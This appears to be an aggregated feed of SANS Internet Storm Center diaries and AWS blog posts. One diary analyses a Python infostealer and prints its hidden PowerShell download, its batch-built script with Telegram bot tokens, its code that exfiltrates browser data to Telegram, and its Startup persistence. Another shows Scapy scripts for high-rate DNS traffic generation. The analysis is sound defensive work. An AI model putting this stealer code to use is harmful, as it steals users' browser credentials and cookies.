Wireshark 4.4.0 is now available, (Sat, Aug 31st)


This is the first 4.4 release. Many new features have been added, details are here.

One feature I already highlighted is custom columns with field expressions: "Wireshark 4.4.0rc1's Custom Columns".

Other new features I'll be looking at are:

  • automatic profile switching based on display filter
  • converting display filters into BPF capture filters
  • implementing display filter functions via plugins

 

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Simulating Traffic With Scapy, (Fri, Aug 30th)


It can be helpful to simulate different kinds of system activity. I had an instance where I wanted to generate logs to test a log forwarding agent. This agent was processing DNS logs. There are a variety of ways that I could have decided to simulate this activity:

  • Generate the raw log file directly, using a variety of tools including Bash, PowerShell, Python, etc. (a quick sketch of this option appears below)
  • Generate DNS traffic using a Bash script [1], a Python script, etc.

Since I'm always looking for another way to use Python, I decided to use a Python script to simulate the DNS traffic. 
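For comparison, the first option from the list above (writing a synthetic log file directly with Python) can be sketched in a few lines. The log format, field names, and file path below are assumptions for illustration, not the format my agent expected:

import random
from datetime import datetime, timezone

names = ["testing.ignore", "example.test", "host1.ignore"]

# Append made-up DNS query log lines to a local file (adjust the format to
# whatever your log forwarding agent actually expects)
with open("synthetic_dns.log", "a") as log_file:
    for _ in range(1000):
        timestamp = datetime.now(timezone.utc).isoformat()
        qname = random.choice(names)
        log_file.write(f"{timestamp} client=192.168.68.50 query={qname} type=A\n")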

 

Sending Serially

To start out, I tested sending traffic to a host one request at a time, using a loop that would continue to send requests with Scapy [2] for three minutes. 

import time, logging, sys
from scapy.all import *

basic_with_time_format = '%(asctime)s:%(levelname)s:%(name)s:%(filename)s:%(funcName)s:%(message)s'
stdout_handler = logging.StreamHandler(stream = sys.stdout)
stdout_handler.setFormatter(logging.Formatter(basic_with_time_format))
stdout_handler.setLevel(logging.INFO)

logging.root.addHandler(stdout_handler)
logging.root.setLevel(logging.INFO)

dst_ip = "192.168.68.1"
dst_port = 53
query = "testing.ignore"

# Build a single DNS query packet (layer 3; send() handles routing for us)
dns_query = IP(dst=dst_ip)/UDP(dport=dst_port)/DNS(rd=1,qd=DNSQR(qname=query))

start_time = time.time()

# Send one query at a time for three minutes, counting how many were sent
send_count = 0
while (time.time() - start_time < 180):
    send(dns_query, verbose=False)
    send_count += 1

logging.info(f"Packets sent: {send_count}")
logging.info(f"Query rate of {send_count / (time.time() - start_time)}/second")


################# LOGGING OUTPUT #################
2024-08-28 21:15:36,216:INFO:root:dns_requests.py:<module>:Packets sent: 42614
2024-08-28 21:15:36,217:INFO:root:dns_requests.py:<module>:Query rate of 236.74056020138102/second

I was able to generate about 42,000 requests, for a rate of about 236 requests per second. Not bad, but I wanted more. What other methods could I use to generate logs with Scapy to try and get a higher volume?

 

Sending Multiple Requests with Count

Next, I tried using Scapy with the "count" option. For this test I used 42,000 requests as a starting point and then measured the rate. 

import time, logging, sys
from scapy.all import *

basic_with_time_format = '%(asctime)s:%(levelname)s:%(name)s:%(filename)s:%(funcName)s:%(message)s'
stdout_handler = logging.StreamHandler(stream = sys.stdout)
stdout_handler.setFormatter(logging.Formatter(basic_with_time_format))
stdout_handler.setLevel(logging.INFO)

logging.root.addHandler(stdout_handler)
logging.root.setLevel(logging.INFO)

dst_ip = "192.168.68.1"
dst_port = 53
query = "testing.ignore"

dns_query = IP(dst=dst_ip)/UDP(dport=dst_port)/DNS(rd=1,qd=DNSQR(qname=query))

start_time = time.time()

# Let Scapy send 42,000 copies of the packet in a single call
send(dns_query, count=42000, verbose=False)

logging.info(f"Complete in {time.time() - start_time} seconds")
logging.info(f"Query rate of {42000 / (time.time() - start_time)}/second")


################# LOGGING OUTPUT #################
2024-08-28 21:19:40,956:INFO:root:dns_requests_count.py:<module>:Complete in 134.46240949630737 seconds
2024-08-28 21:19:40,957:INFO:root:dns_requests_count.py:<module>:Query rate of 312.35329612384174/second

This gave me about 312 requests per second, which was a nice improvement over the previous test: approximately 32% more requests.

 

Sending Multiple Requests with Threading

What about using threading? Could this give me more request volume if I could send more data with less delay?

import time, logging, sys
from scapy.all import *
from concurrent.futures import ThreadPoolExecutor

basic_with_time_format = '%(asctime)s:%(levelname)s:%(name)s:%(filename)s:%(funcName)s:%(message)s'
stdout_handler = logging.StreamHandler(stream = sys.stdout)
stdout_handler.setFormatter(logging.Formatter(basic_with_time_format))
stdout_handler.setLevel(logging.INFO)

logging.root.addHandler(stdout_handler)
logging.root.setLevel(logging.INFO)

dst_ip = "192.168.68.1"
dst_port = 53
query = "testing.ignore"

dns_query = IP(dst=dst_ip)/UDP(dport=dst_port)/DNS(rd=1,qd=DNSQR(qname=query))

start_time = time.time()

send_count = 0
# Submit send() calls to a thread pool for three minutes instead of sending them inline
runner = ThreadPoolExecutor()
queries = []
while (time.time() - start_time < 180):
    queries.append(runner.submit(send, dns_query, verbose=False))
    send_count += 1


done = False
while not done:
    number_not_complete = 0
    for each_query in queries:
        if not each_query.done():
            number_not_complete += 1
            logging.debug(f"State: {each_query._state} left")
    if number_not_complete == 0:
        done = True
        logging.info(f"Processing completed. {number_not_complete} left")
    else:
        logging.info(f"Processing not yet completed. {number_not_complete} left")
    time.sleep(1)

logging.info(f"Packets sent: {send_count}")
logging.info(f"Seconds elapsed: {time.time() - start_time}")
logging.info(f"Query rate of {send_count / (time.time() - start_time)}/second")


################# LOGGING OUTPUT #################
2024-08-28 21:23:54,199:INFO:root:dns_request_threaded.py:<module>:Processing not yet completed. 278 left
2024-08-28 21:23:55,372:INFO:root:dns_request_threaded.py:<module>:Processing not yet completed. 24 left
2024-08-28 21:23:56,546:INFO:root:dns_request_threaded.py:<module>:Processing completed. 0 left
2024-08-28 21:23:57,547:INFO:root:dns_request_threaded.py:<module>:Packets sent: 45475
2024-08-28 21:23:57,548:INFO:root:dns_request_threaded.py:<module>:Seconds elapsed: 183.54532933235168
2024-08-28 21:23:57,549:INFO:root:dns_request_threaded.py:<module>:Query rate of 247.75896049992585/second  

This gave me about 247 requests per second. A little faster than my first test, but not as fast as using the "count" option.

 


Figure 1: Traffic volume comparisons with different Scapy options.

 

 

Scapy sendp() or send()?

I still wanted more volume. What else could I test? There are multiple functions that can be used to send data with Scapy, including send() and sendp() [3]. sendp() requires some additional configuration since it doesn't handle some of the routing that send() does. Would manually configuring those options, and taking on some of that routing work myself, help with volume?

First, I needed some information to properly configure my packets: my interface name.

>>> conf.iface
<NetworkInterface_Win Intel(R) Wi-Fi 6E AX210 160MHz [UP+RUNNING+WIRELESS+OK]>

 

With this information in hand, I tried a new test, adding an Ethernet header and specifying my interface.

import time, logging, sys
from scapy.all import *

basic_with_time_format = '%(asctime)s:%(levelname)s:%(name)s:%(filename)s:%(funcName)s:%(message)s'
stdout_handler = logging.StreamHandler(stream = sys.stdout)
stdout_handler.setFormatter(logging.Formatter(basic_with_time_format))
stdout_handler.setLevel(logging.INFO)

logging.root.addHandler(stdout_handler)
logging.root.setLevel(logging.INFO)

dst_ip = "192.168.68.1"
dst_port = 53
query = "testing.ignore"
interface = "Intel(R) Wi-Fi 6E AX210 160MHz"

dns_query = Ether()/IP(dst=dst_ip)/UDP(dport=dst_port)/DNS(rd=1,qd=DNSQR(qname=query))

start_time = time.time()

# sendp() works at layer 2, so the Ethernet header and interface are supplied explicitly
sendp(dns_query, count=42000, verbose=False, iface=interface)

logging.info(f"Complete in {time.time() - start_time} seconds")
logging.info(f"Query rate of {42000 / (time.time() - start_time)}/second")


################# LOGGING OUTPUT #################
2024-08-28 22:09:09,894:INFO:root:<stdin>:<module>:Complete in 41.14687180519104 seconds
2024-08-28 22:09:09,894:INFO:root:<stdin>:<module>:Query rate of 1020.7337315664743/second

I was able to achieve a rate of about 1021 requests per second. Over three times the volume from previous tests.

 

Scapy Sending Method   Option(s)      Sending Rate
send()                 (none)         236.74 queries/second
send()                 count=42000    312.35 queries/second
send()                 threading      247.76 queries/second
sendp()                count=42000    1020.73 queries/second

Figure 2: Volume rate comparisons with different scapy options and methods.

 

Since I wanted to make sure that everything was working correctly, I decided to update my script to send one request with sendp() to an external resolver. 

################## EXCERPT ##################

dst_ip = "8.8.8[.]8"
dst_port = 53
query = "testing.ignore"
interface = "Intel(R) Wi-Fi 6E AX210 160MHz"

dns_query = Ether()/IP(dst=dst_ip)/UDP(dport=dst_port)/DNS(rd=1,qd=DNSQR(qname=query))
sendp(dns_query, iface=interface)

################## EXCERPT ##################


Figure 3: DNS "NXDOMAIN" response for "testing.ignore", confirming sendp() worked.

 

There are still many other ways to replicate DNS activity and log generation. A good option is simply recording previous sessions to a PCAP and playing them back [3]. Creating the local log file directly, rather than having the DNS service create it, would probably allow for a higher logging volume, since it eliminates any bottlenecks in the DNS service or the device(s) sending the requests. However, replicating the DNS traffic also helped test the DNS server in addition to the logging agent. Another benefit of this option is that Zeek [4] data was available to validate the traffic, volume, and responses.
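For the record-and-replay option, a minimal Scapy sketch could look like the following (the capture file name is made up for illustration; the interface is the one used earlier in this post):

from scapy.all import rdpcap, sendp

interface = "Intel(R) Wi-Fi 6E AX210 160MHz"

# Load previously captured DNS sessions (hypothetical file name)
packets = rdpcap("dns_capture.pcap")

# Replay the recorded frames as-is on the chosen interface
sendp(packets, iface=interface, verbose=False)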

Do you have another way you would have done this stress testing? Let me know!

 

[1] https://www.reddit.com/r/networking/comments/k8tdj7/dns_traffic_generator/
[2] https://scapy.net/
[3] https://scapy.readthedocs.io/en/latest/usage.html
[4] https://zeek.org/


Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Live Patching DLLs with Python, (Thu, Aug 29th)


In my previous diary[1], I explained why Python became popular with attackers. One of the reasons given was that, from Python scripts, it's possible to call any Windows API and, therefore, perform low-level activities on the system. In another script, besides a classic code injection into a remote process, I found an implementation of another good old technique: live patching of a DLL.

Announcing AWS Parallel Computing Service to run HPC workloads at virtually any scale


Today we are announcing AWS Parallel Computing Service (AWS PCS), a new managed service that helps customers set up and manage high performance computing (HPC) clusters so they seamlessly run their simulations at virtually any scale on AWS. Using the Slurm scheduler, they can work in a familiar HPC environment, accelerating their time to results instead of worrying about infrastructure.

In November 2018, we introduced AWS ParallelCluster, an AWS supported open-source cluster management tool that helps you to deploy and manage HPC clusters in the AWS Cloud. With AWS ParallelCluster, customers can also quickly build and deploy proof of concept and production HPC compute environments. They can use AWS ParallelCluster Command-Line interface, API, Python library, and the user interface installed from open source packages. They are responsible for updates, which can include tearing down and redeploying clusters. Many customers, though, have asked us for a fully managed AWS service to eliminate operational jobs in building and operating HPC environments.

AWS PCS simplifies HPC environments managed by AWS and is accessible through the AWS Management Console, AWS SDK, and AWS Command Line Interface (AWS CLI). Your system administrators can create managed Slurm clusters that use their compute and storage configurations, identity, and job allocation preferences. AWS PCS uses Slurm, a highly scalable, fault-tolerant job scheduler used across a wide range of HPC customers, for scheduling and orchestrating simulations. End users such as scientists, researchers, and engineers can log in to AWS PCS clusters to run and manage HPC jobs, use interactive software on virtual desktops, and access data. They can bring their workloads to AWS PCS quickly, without significant effort to port code.

You can use fully managed NICE DCV remote desktops for remote visualization, and access job telemetry or application logs to enable specialists to manage your HPC workflows in one place.

AWS PCS is designed for a wide range of traditional and emerging, compute or data-intensive, engineering and scientific workloads across areas such as computational fluid dynamics, weather modeling, finite element analysis, electronic design automation, and reservoir simulations using familiar ways of preparing, executing, and analyzing simulations and computations.

Getting started with AWS Parallel Computing Service
To try out AWS PCS, you can use our tutorial for creating a simple cluster in the AWS documentation. First, you create a virtual private cloud (VPC) with an AWS CloudFormation template and shared storage in Amazon Elastic File System (Amazon EFS) within your account for the AWS Region where you will try AWS PCS. To learn more, visit Create a VPC and Create shared storage in the AWS documentation.

1. Create a cluster
In the AWS PCS console, choose Create cluster, a persistent resource for managing resources and running workloads.

Next, enter your cluster name and choose the controller size of your Slurm scheduler. You can choose Small (up to 32 nodes and 256 jobs), Medium (up to 512 nodes and 8,192 jobs), or Large (up to 2,048 nodes and 16,384 jobs) for the limits of cluster workloads. In the Networking section, choose your created VPC, subnet to launch the cluster, and security group applied to your cluster.

Optionally, you can set the Slurm configuration such as an idle time before compute nodes will scale down, a Prolog and Epilog scripts directory on launched compute nodes, and a resource selection algorithm parameter used by Slurm.

Choose Create cluster. It takes some time for the cluster to be provisioned.

2. Create compute node groups
After creating your cluster, you can create compute node groups, a virtual collection of Amazon Elastic Compute Cloud (Amazon EC2) instances that AWS PCS uses to provide interactive access to a cluster or run jobs in a cluster. When you define a compute node group, you specify common traits such as EC2 instance types, minimum and maximum instance count, target VPC subnets, Amazon Machine Image (AMI), purchase option, and custom launch configuration. Compute node groups require an instance profile to pass an AWS Identity and Access Management (IAM) role to an EC2 instance and an EC2 launch template that AWS PCS uses to configure the EC2 instances it launches. To learn more, visit Create a launch template and Create an instance profile in the AWS documentation.

To create a compute node group in the console, go to your cluster and choose the Compute node groups tab and the Create compute node group button.

You can create two compute node groups: a login node group to be accessed by end users and a job node group to run HPC jobs.

To create a compute node group running HPC jobs, enter a compute node name and select a previously-created EC2 launch template, IAM instance profile, and subnets to launch compute nodes in your cluster VPC.

Next, choose your preferred EC2 instance types to use when launching compute nodes and the minimum and maximum instance count for scaling. I chose the hpc6a.48xlarge instance type and a scale limit of up to eight instances. For a login node, you can choose a smaller instance, such as one c6i.xlarge instance. You can also choose either the On-Demand or Spot EC2 purchase option if the instance type supports it. Optionally, you can choose a specific AMI.

Choose Create. It takes some time for the compute node group to be provisioned. To learn more, visit Create a compute node group to run jobs and Create a compute node group for login nodes in the AWS documentation.

3. Create and run your HPC jobs
After creating your compute node groups, you submit a job to a queue to run it. The job remains in the queue until AWS PCS schedules it to run on a compute node group, based on available provisioned capacity. Each queue is associated with one or more compute node groups, which provide the necessary EC2 instances to do the processing.

To create a queue in the console, go to your cluster and choose the Queues tab and the Create queue button.

Enter your queue name and choose your compute node groups assigned to your queue.

Choose Create and wait while the queue is being created.

When the login compute node group is active, you can use AWS Systems Manager to connect to the EC2 instance it created. Go to the Amazon EC2 console and choose your EC2 instance of the login compute node group. To learn more, visit Create a queue to submit and manage jobs and Connect to your cluster in the AWS documentation.

To run a job using Slurm, you prepare a submission script that specifies the job requirements and submit it to a queue with the sbatch command. Typically, this is done from a shared directory so the login and compute nodes have a common space for accessing files.

You can also run a message passing interface (MPI) job in AWS PCS using Slurm. To learn more, visit Run a single node job with Slurm or Run a multi-node MPI job with Slurm in the AWS documentation.

You can connect a fully-managed NICE DCV remote desktop for visualization. To get started, use the CloudFormation template from HPC Recipes for AWS GitHub repository.

In this example, I used the OpenFOAM motorBike simulation to calculate the steady flow around a motorcycle and rider. This simulation was run with 288 cores of three hpc6a instances. The output can be visualized in the ParaView session after logging in to the web interface of DCV instance.

Finally, after you are done running HPC jobs with the cluster and node groups that you created, you should delete the resources that you created to avoid unnecessary charges. To learn more, visit Delete your AWS resources in the AWS documentation.

Things to know
Here are a couple of things that you should know about this feature:

  • Slurm versions – AWS PCS initially supports Slurm 23.11 and offers mechanisms designed to enable customers to upgrade their Slurm major versions once new versions are added. Additionally, AWS PCS is designed to automatically update the Slurm controller with patch versions. To learn more, visit Slurm versions in the AWS documentation.
  • Capacity Reservations – You can reserve EC2 capacity in a specific Availability Zone and for a specific duration using On-Demand Capacity Reservations to make sure that you have the necessary compute capacity available when you need it. To learn more, visit Capacity Reservations in the AWS documentation.
  • Network file systems – You can attach network storage volumes where data and files can be written and accessed, including Amazon FSx for NetApp ONTAP, Amazon FSx for OpenZFS, and Amazon File Cache as well as Amazon EFS and Amazon FSx for Lustre. You can also use self-managed volumes, such as NFS servers. To learn more, visit Network file systems in the AWS documentation.

Now available
AWS Parallel Computing Service is now available in the US East (N. Virginia), US East (Ohio), US West (Oregon), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo), Europe (Frankfurt), Europe (Ireland), and Europe (Stockholm) Regions.

AWS PCS launches all resources in your AWS account. You will be billed appropriately for those resources. For more information, see the AWS PCS Pricing page.

Give it a try and send feedback to AWS re:Post or through your usual AWS Support contacts.

Channy

P.S. Special thanks to Matthew Vaughn, a principal developer advocate at AWS, for his contribution in creating an HPC testing environment.

Vega-Lite with Kibana to Parse and Display IP Activity over Time, (Tue, Aug 27th)


I have been curious for a while about Kibana's Vega parsing options, trying to come up with displays and layouts that aren't standard in Kibana. A lot of the potential layouts already exist in Kibana, but some of the others aren't easily created, and Vega [2] provides some of the building blocks to create the kind of output that I am researching and testing with DShield sensor data captured by the cowrie honeypot [4].

Building a Query in the Visualize Library

In my test query, I wanted to display the IP list on the left of the graph and the date of the activity along the bottom. This way, when I choose to summarize the activity by IP, or by any of the other fields I happen to select, it will display the activity by date for any IP that was active over time.

A text copy of the JSON code is posted at the bottom. This simple query takes the data from the cowrie logs as its input and formats the output:

The Data Output

Before I zoom in on the time of interest to see some of the long-term activity, this is what up to 10,000 records look like with all the IPs displayed in this picture. It is now easy to see a cluster of activity; next we need to zoom in on the time of the activity to find which IP produced this cluster.

After I zoom in on the data, the result of a 7-day query shows the following cluster of activity over time. In this picture, you can see that one IP, 193.201.9.156, was active for several hours between 22 Aug 06:00 and 22 Aug 21:00.

DShield SIEM Integration

The primary goal of this test is to integrate this into the DShield SIEM [3] ELK stack, to be able to see in one of the dashboards which actors are active and for how long they can be seen over time. Now that we have an IP to look at, the time range can be expanded as far as I want, and this picture shows the activity of IP 193.201.9.156 over the past 30 days.


Sample Vega-Lite Query

This is the code used in the above example:

{
  $schema: https://vega.github.io/schema/vega-lite/v5.json
  title: Cowrie Logs – Actor Activity over Time
  data: {
    url: {
      %context%: true
      %timefield%: @timestamp
      interval: {%autointerval%: true}
      index: cowrie*
      body: {
        size: 10000
        _source: ["@timestamp","related.ip", "source.address", "user.name"]
      }
    }
    format: {property: "hits.hits"}
  }

  transform: [ 
  {calculate: "toDate(datum._source['@timestamp'])", as: "Time"},
  {"calculate": "datum._source['related.ip']", "as": "IP"},
  {"calculate": "datum._source['user.name']", "as": "Name"}
  ]
  mark: square
  encoding: {
    // https://vega.github.io/vega-lite/docs/timeunit.html#input
    // Change timeUnit to display Month Day and Hour of activity
    x: {"timeUnit": "monthdatehours",field: "Time", type: "ordinal", title: "Date/Time" }
    y: {field: "IP", type: "ordinal", title: "Actor IP Address"}
    color: {field: "IP", type: "ordinal", legend: null}
  }
 }

[1] https://www.elastic.co/guide/en/kibana/current/vega.html
[2] https://vega.github.io/vega/examples/
[3] https://github.com/bruneaug/DShield-SIEM
[4] https://github.com/DShield-ISC/dshield

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Why Is Python so Popular to Infect Windows Hosts?, (Tue, Aug 27th)


It has been a while since I started to track how Python is used in the Windows ecosystem[1]. Almost every day I find new pieces of malicious Python scripts. The programming language itself is not malicious, and there are plenty of reasons to use Python on Windows. Think about all of Didier's tools[2]: most of them are written in Python!

Why did Python become so popular with attackers? I think that the main reason is that, although the language is not installed by default on Windows, it can be deployed easily by unpacking some files into any directory, without requiring administrator rights:

@echo off
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI hxxps://github[.]com/h4x0rpeter/CookieStealer/raw/main/python.zip -OutFile C:\Users\Public\Document.zip;
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden expand-Archive C:\Users\Public\Document.zip -DestinationPath C:\Users\Public\Document;

Python can be extended using libraries and, if they are added to the ZIP archive, the attacker can expand the default Python capabilities.

Another fact is that Python is not integrated into the AMSI[3] framework like other scripting languages (JS, VBS, PowerShell) are. You can easily trace script activity through AMSI:

PS1:> logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets

This command will start recording all activities generated by scripts… except for Python!

Another reason why Python is so popular: it can interact with all layers of the operating system (filesystem, registry, processes, network, …) but can also call any API from any DLL! I mentioned this in yesterday's diary[4].
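As a quick, harmless illustration of how little code this takes, here is a minimal ctypes sketch (my own example, not taken from the malware) that calls a Windows API directly from kernel32.dll:

import ctypes

# Call GetTickCount64() straight out of kernel32.dll, no extra module required
kernel32 = ctypes.WinDLL("kernel32")
kernel32.GetTickCount64.restype = ctypes.c_ulonglong
uptime_ms = kernel32.GetTickCount64()
print(f"System uptime: {uptime_ms // 1000} seconds")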

Once Python has been deployed on the victim's computer, the malicious script must be delivered. Often the script is downloaded from an online resource; sometimes it can be extracted or … reconstructed! Today, I found a batch file that generates the malicious script by echoing all the lines into a file on disk:

echo import os,json,shutil,win32crypt,hmac,platform,sqlite3,base64,random,requests,subprocess>>C:\Users\Public\stub.py
echo from datetime import datetime,timedelta>>C:\Users\Public\stub.py
echo from Crypto.Cipher import DES3>>C:\Users\Public\stub.py
echo from Crypto.Cipher import AES>>C:\Users\Public\stub.py
echo from pyasn1.codec.der import decoder>>C:\Users\Public\stub.py
echo from hashlib import sha1, pbkdf2_hmac>>C:\Users\Public\stub.py
echo from Crypto.Util.Padding import unpad >>C:\Users\Public\stub.py
echo from base64 import b64decode>>C:\Users\Public\stub.py
echo idbot = "backup">>C:\Users\Public\stub.py
echo apibot1='7363228617:AAHqve2-Ypl4SopNb04FOWW2Drm6zQ3v8gg'>>C:\Users\Public\stub.py
echo id1='-4288554353'>>C:\Users\Public\stub.py
echo apibot2='7363228617:AAHqve2-Ypl4SopNb04FOWW2Drm6zQ3v8gg'>>C:\Users\Public\stub.py
echo id2='4288554353'>>C:\Users\Public\stub.py
echo hostname = os.getenv("COMPUTERNAME")>>C:\Users\Public\stub.py
echo usernamex = os.getlogin()>>C:\Users\Public\stub.py
echo windows_version = platform.platform()>>C:\Users\Public\stub.py
echo now = datetime.now()>>C:\Users\Public\stub.py
echo response =requests.get("https://ipinfo.io").text>>C:\Users\Public\stub.py
echo ip_country = json.loads(response)>>C:\Users\Public\stub.py
echo name_country = ip_country['region']>>C:\Users\Public\stub.py

The purpose of the script is simple: It's another infostealer that will exfiltrate collected information via Telegram:

def main():
    numbers=intNumbers()    
    number = "Status number send: " + str(numbers)
    u2 = 'hxxps://api[.]telegram[.]org/bot'+apibot2+'/sendDocument'
    u1 = 'hxxps://api[.]telegram[.]org/bot'+apibot1+'/sendDocument'
    browsers = {
        'chrome': os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data"),
        'Edge': os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Microsoft", "Edge", "User Data"),
        'Opera': os.path.join(os.environ["USERPROFILE"], "AppData", "Roaming", "Opera Software", "Opera Stable"),
        'Brave': os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "BraveSoftware", "Brave-Browser", "User Data"),
        'firefox': os.path.join(os.environ["USERPROFILE"], "AppData", "Roaming", "Mozilla", "Firefox", "Profiles"),
        'chromium': os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Chromium", "User Data")
    }
    data_path = os.path.join(os.environ["TEMP"], name_f)
    os.mkdir(data_path)
    data_path_ck = os.path.join(os.environ["TEMP"], name_f, "filecookie")
    os.mkdir(data_path_ck)
    for browser_name, browser_path in browsers.items():
        get_browser_data(data_path, browser_path, browser_name)
    zip_file_path = os.path.join(os.environ["TEMP"], name_f + '.zip')
    shutil.make_archive(zip_file_path[:-4], 'zip', data_path)
    if numbers == 1:
        with open(zip_file_path, 'rb') as f:
            requests.post(u1,data={'caption': "\n"+"Country : "+name_country + "-" + timezone + "\n"+ windows_version +"\r\nIPAdress:"+ip + "\r\n"+ number,'chat_id': id1},files={'document': f})
    else :
        with open(zip_file_path, 'rb') as f:
             requests.post(u2,data={'caption': "\n"+"Country :  "+ name_country + "-" + timezone +"\n"+ windows_version +"\r\nIPAddress:"+ip + "\r\n"+ number,'chat_id': id2},files={'document': f})
    shutil.rmtree(data_path, ignore_errors=True)
    try:
        os.remove(zip_file_path)
    except Exception as e:
        print("Error")

Funny, the exfiltrated data will be sent to two different Telegram bots depending on the value of numbers. It's a simple load-balancing solution:

def intNumbers():
    path_demso = r"C:\Users\Public\number.txt"
    if os.path.exists(path_demso):
        with open(path_demso, 'r') as file:
            number = file.read()
        number = int(number)+1
        with open(path_demso, 'w') as file:
            abc = str(number)
            file.write(abc)
    else:
        with open(path_demso, 'w') as file:
            file.write("1")
            number = 1
    return number

Finally, persistence will be added via the Startup menu:

for /f %%i in ('echo %USERNAME%') do set user=%%i
echo cmd /c C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden C:\Users\Public\Document\python.exe C:\Users\Public\stub.py;>>C:\Users\Public\Windows.bat
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -command "Get-Content 'C:\Users\Public\Windows.bat' | Set-Content 'C:\Users\!user!\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.bat'"

The batch file again has a low VT score (4/65)[5].

Conclusion: keep an eye on Python processes on your Windows hosts! If you don't need Python for your daily tasks, any Python process should be considered suspicious!
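If you want a quick way to spot them, here is a small sketch using the third-party psutil module (my suggestion, not something used in this diary) that lists every running Python interpreter:

import psutil  # third-party: pip install psutil

# Print any running process whose name looks like a Python interpreter
for proc in psutil.process_iter(["pid", "name", "exe", "cmdline"]):
    name = (proc.info["name"] or "").lower()
    if name.startswith("python"):
        print(proc.info["pid"], proc.info["exe"], " ".join(proc.info["cmdline"] or []))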

[1] https://www.sans.org/webcasts/who-said-that-python-was-unix-best-friend-only/
[2] https://blog.didierstevens.com/my-software/
[3] https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal
[4] https://isc.sans.edu/diary/From%20Highly%20Obfuscated%20Batch%20File%20to%20XWorm%20and%20Redline/31204
[5] https://www.virustotal.com/gui/file/e721ae2bfd0f3bc4da3b60090aa734cd31878134ed3fdfa49abc4b26b825da47/detection

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AWS Weekly Roundup: S3 Conditional writes, AWS Lambda, JAWS Pankration, and more (August 26, 2024)


The AWS User Group Japan (JAWS-UG) hosted JAWS PANKRATION 2024 themed ‘No Border’. This is a 24-hour online event where AWS Heroes, AWS Community Builders, AWS User Group leaders, and others from around the world discuss topics ranging from cultural discussions to technical talks. One of the speakers at this event, Kevin Tuei, an AWS Community Builder based in Kenya, highlighted the importance of building in public and sharing your knowledge with others, a very fitting talk for this kind of event.

Last week’s launches
Here are some launches that got my attention during the previous week.

Amazon S3 now supports conditional writes – We've added support for conditional writes in Amazon S3, which check for the existence of an object before creating it. With this feature, you can now simplify how distributed applications with multiple clients concurrently update data in parallel across shared datasets. Each client can conditionally write objects, making sure that it does not overwrite any objects already written by another client.
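As a rough sketch of what this looks like in code, assuming a recent boto3 release that exposes the If-None-Match header as the IfNoneMatch parameter on put_object (the bucket and key names below are hypothetical):

import boto3
from botocore.exceptions import ClientError

s3 = boto3.client("s3")

try:
    # IfNoneMatch="*" asks S3 to create the object only if it does not already exist
    s3.put_object(
        Bucket="example-bucket",
        Key="shared/dataset-part-001.json",
        Body=b'{"status": "processed"}',
        IfNoneMatch="*",
    )
    print("Object written")
except ClientError as err:
    # HTTP 412 PreconditionFailed means another client already wrote this key
    if err.response["Error"]["Code"] == "PreconditionFailed":
        print("Object already exists, skipping")
    else:
        raise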

AWS Lambda introduces recursive loop detection APIs – With the recursive loop detection APIs, you can now set recursive loop detection configuration on individual AWS Lambda functions. This allows you to turn off recursive loop detection on functions that intentionally use recursive patterns, avoiding disruption to those workflows as Lambda expands recursive loop detection to other AWS services. You can configure recursive loop detection for Lambda functions through the Lambda console, the AWS Command Line Interface (AWS CLI), or Infrastructure as Code tools like AWS CloudFormation, AWS Serverless Application Model (AWS SAM), or the AWS Cloud Development Kit (AWS CDK). This new configuration option is supported in AWS SAM CLI version 1.123.0 and CDK v2.153.0.
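As a hedged sketch of the new configuration APIs, assuming boto3 exposes them as put_function_recursion_config and get_function_recursion_config (the function name below is hypothetical):

import boto3

lambda_client = boto3.client("lambda")

# Allow this function to be invoked recursively instead of being stopped by
# Lambda's recursive loop detection (the default behavior is "Terminate")
lambda_client.put_function_recursion_config(
    FunctionName="my-intentionally-recursive-function",
    RecursiveLoop="Allow",
)

# Read the current setting back
config = lambda_client.get_function_recursion_config(
    FunctionName="my-intentionally-recursive-function"
)
print(config["RecursiveLoop"])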

General availability of Amazon Bedrock batch inference API – You can now use Amazon Bedrock to process prompts in batch to get responses for model evaluation, experimentation, and offline processing. Using the batch API makes it more efficient to run inference with foundation models (FMs). It also allows you to aggregate responses and analyze them in batches. To get started, visit Run batch inference.

Other AWS news
Launched in July 2024, AWS GenAI Lofts is a global tour designed to foster innovation and community in the evolving landscape of generative artificial intelligence (AI) technology. The lofts bring collaborative pop-up spaces to key AI hotspots around the world, offering developers, startups, and AI enthusiasts a platform to learn, build, and connect. The events are ongoing. Find a location near you and be sure to attend soon.

Upcoming AWS events
AWS Summits – These are free online and in-person events that bring the cloud computing community together to connect, collaborate, and learn about AWS. Whether you’re in the Americas, Asia Pacific & Japan, or EMEA region, learn more about future AWS Summit events happening in your area. On a personal note, I look forward to being one of the keynote speakers at the AWS Summit Johannesburg happening this Thursday. Registrations are still open and I look forward to seeing you there if you’ll be attending.

AWS Community Days – Join an AWS Community Day event just like the one I mentioned at the beginning of this post to participate in technical discussions, workshops, and hands-on labs led by expert AWS users and industry leaders from your area. If you’re in New York, there’s an event happening in your area this week.

You can browse all upcoming in-person and virtual events here.

That’s all for this week. Check back next Monday for another Weekly Roundup!

– Veliswa

